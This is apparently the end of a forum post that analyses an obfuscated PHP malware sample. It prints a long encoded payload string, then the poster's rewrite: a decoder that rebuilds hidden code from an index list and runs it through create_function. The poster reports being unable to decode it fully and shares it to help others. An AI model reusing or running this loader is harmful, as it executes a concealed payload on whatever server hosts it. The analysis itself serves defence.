x22!ftmbg)!gj<*#k#)usbut`cpV    x7f x7f x7f >!bssbz)#44ec:649#-!#:61**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x6<&w6< x7fw6*CW&)7gj6<.[A  x27&6:.2^,%b:<!%c:>%s:  x5y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y8M8]Df#<%tdz>#L4]275L3]248L3P6L1M11112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0LOBALS["  x61 156 x75 156 x61"])))) { $GLOBALS["  x61 156 x75fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#    x27rfs%6~6  x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA  x273qj%6<*Y%)fnbozcYufhpqsut>j%!*72!    x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)t]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m5]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!   x2400~:<h%_t%:  x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:5epmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)24/%t2w/   x24)##-!#~<#/%  x24-    x24!>   120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54"]); if ((strstr(7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)uftt]26 x24-    x24<%j,,*!| x24z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~    x24<!fwbe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFShnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde5]D2P4]D6#<%G]y6d]281Ld]24~6<Cw6<pd%w6Z6<.5`hA    x27pd%6<pd%w6Z6<.4`hA   x27pd%6<pd%w6Z66-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3])1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#pjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439277-n%)utjm6<  x7fw6*CW&)7hdqhh($n){return chr(ord($n)-1);} @err`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%   x]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yosvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]272    x5c2b%!>!2p%!*3>?*2fpg)%    x24-    x24*<!~!    x]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]4#)tutjyf`4   x223}!+!<+{e%+*!*+fepdf!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sut x27;!>>>!}_;gvc%}&;ftmbg}   x7f;!osvufs}w;* x7f!>>  x22!pd%)!or_reporting(0); $wxtksra = implode(array_map("hgj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|cvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg   x22!fyqmpef)#   x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!  x24/]241]334]368]322]3]364]6]283]427]36]373P6]36]73]A   x272qj%6<^#zsfvr#   x5cq%7bfsX  x27u%)7fmjix6<C x27&6<*rfs%7-K)xW~!Ypp2)%zB%z>! x24/%tmw/   x24)%zW%h>EzH,2W%84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]D47doj%6<   x7fw6*  x7f_*#fmjgk4`{6~6<tfs%w6<   x7fw6*CWtfs%)$uas," x6d 163 x69 145")) or (strstr($uas,"    x72 x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x24if((function_exists("    x6f 142 x5f 163 x74 141 x72 164") && (!isset($G%!<*#}_;#)323ldfid>}&;!osvufs}   x7f;!o.%!<***f  x27,*e  x27,*d  x27,*c  x#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fpqsut>j%!*9!    x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)suj:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>-!%w:**<")));$ieihxyt = $rlimhzz("", $wxtksra); $ieihehdqhh",str_split("%tjw!>.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&/7#@#7/7^#iubq#    x5cq%   x27jsv%6<C>^#zsfvr# x<.3`hA x27pd%6<pd%w6Z6<.2gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)e1<!fmtf!%b:>%s:   x5c%j8d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%r)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>    x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cS!}  x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!    x27{!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!  x24676724]31#-%tdz*Wsfuvso!%bss x5csboe)<   x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA  x22)7<  x7fw6*  x7f_*#fubfsdXk5`{STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSieuiflww';


function decryptor($numbers, $encrypted) {
    $payload = NULL;

    // using the giant numbers array below, go through and grab pieces of the monsterous string above
    for($i=0; $i < sizeof($numbers)/2; $i++) {
        $payload .= substr($encrypted, $numbers[($i*2)], $numbers[($i*2) + 1]);
    }

    return str_replace("\t", "\\", $payload);
};

$key = explode(',', '5002,69,2916,59,403,32,1932,20,3462,65,4898,48,872,34,2328,58,1468,64,4018,38,4429,48,5356,25,5747,70,3777,58,5467,25,671,23,5381,43,3995,23,5492,40,4707,36,2975,64,5850,50,748,63,3039,63,4681,26,5424,43,1128,37,1725,33,5900,26,1070,58,4844,54,960,52,2060,31,1996,33,239,27,2733,31,266,40,1864,68,496,42,4370,59,4477,41,1296,62,1532,34,1606,29,3102,48,5206,60,1165,37,811,61,4334,36,4518,67,2029,31,4200,21,160,53,5610,46,5108,31,1758,48,2859,57,5139,67,3365,63,1378,66,3649,46,4056,46,3527,48,306,62,5656,39,538,60,5071,37,3926,69,1358,20,3695,56,4300,34,1255,41,2591,49,1566,40,1806,29,1952,44,115,45,0,62,1444,24,5695,52,2664,69,376,27,2784,43,3194,66,4148,52,3150,44,1202,53,4242,58,2494,46,694,54,4946,56,644,27,598,46,2540,29,3575,24,435,61,4221,21,3428,34,4585,48,2115,21,3260,39,2091,24,2640,24,5553,57,4743,44,62,53,2386,64,3299,66,3835,49,4787,57,4102,46,2195,69,2827,32,3751,26,2569,22,1012,58,2136,59,4633,48,1682,43,2450,44,5817,33,3884,42,1835,29,5266,37,5532,21,2764,20,2264,64,3599,50,1635,47,906,54,213,26,5303,53,368,8');

$probablyEvilFunction = create_function("", decryptor($key, $encrypted));

$probablyEvilFunction("");
```

You need the right combination of the giant string up top and the numbers array at the bottom. It creates a function by pulling letters out of the giant string using the numbers in the array as indexes for each character.

I couldn't get any farther than this because the giant string and the numbers don't match up well enough for `create_function` to get the right arguments.

Hopefully this helps some future person.